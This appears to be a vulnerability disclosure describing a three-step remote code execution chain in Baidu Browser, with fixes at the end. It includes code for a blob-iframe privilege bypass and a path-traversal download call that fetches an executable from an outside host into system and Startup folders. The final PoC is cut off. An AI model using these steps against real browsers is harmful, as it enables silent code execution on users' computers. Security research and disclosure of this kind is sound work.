Baidu Browser Remote Command Execution 2-bypassing privileged domain restrictions and Solutions

Baidu Browser Remote Command Execution 2-bypassing privileged domain restrictions and Solutions

Three vulnerabilities are used in total:

1. Bypass privileged domain judgment

2. Use the defect API to download any program to a specified directory

3. Download the program to the user startup directory based on the computer user name leakage Defect

1. there is a problem with privileged domain restrictions, Baidu browser in addition to allowing bdbrowser: // and http://xapp.baidu.com/these two outer, I found that file domain can also execute privileged API, when we redirect from the http domain to the bdbrowser or file domain, we will be prompted to prohibit access to resources in the local region, which reminds me of another thing that is a bit local blob. Therefore, the console tests the following code:

Var data = '<script> execute privileged command </script>'; var blob = new Blob ([data], {"type": "text/html "}); (function () {var iframe = document. createElement ("iframe"); iframe. src = URL. createObjectURL (blob); document. body. appendChild (iframe );})()

The code can be successfully executed, so that we can execute the privileged API on any page.







2. The name parameter of the privileged API bdbrowser. skin. download is not filtered. As a result, skin files can be downloaded to any specified directory on the system disk.
 

window.external.StartRequest(1,"bdbrowser.skin.download","(function(id,res){console.log(res)})","{\"name\":\"1/../../../../../../../../../../../../../cmd.exe\",\"url\":\"http://192.168.1.105/testbaidu.exe\"}",window,"")

For example, if the above code is used, a cmd.exe will be generated in the system root directory, as shown in:


 

3. to execute the command, you also need to write the program to the "Start" directory of the system.



However, you need to know the user name in the startup directory path. After research, we found that:



AppService. appMarket. downloadPack and AppService. appMarket. the two APIs of DeleteExt can cause user name leakage. If you do not use the techniques used in the previous vulnerability, the former will pop up the installation prompt, while the latter will not prompt, however, the latter requires that you have installed a plug-in.


 

4. Based on the above three steps, we can build the following PoC code for your reference only. We tested it in WIN7 and IE.

<Html> 


After the final execution, the effect is shown in:


 


 
Solution:
1. Fixed privileged domain judgment

2. Strictly filter the parameters of the privileged API bdbrowser. skin. download to restrict the download path and download source.

3. The sensitive path information in the returned data of AppService. AppMarket. DownloadPack and AppService. AppMarket. DeleteExt is blocked. If the data is not required, you can choose not to return the path information.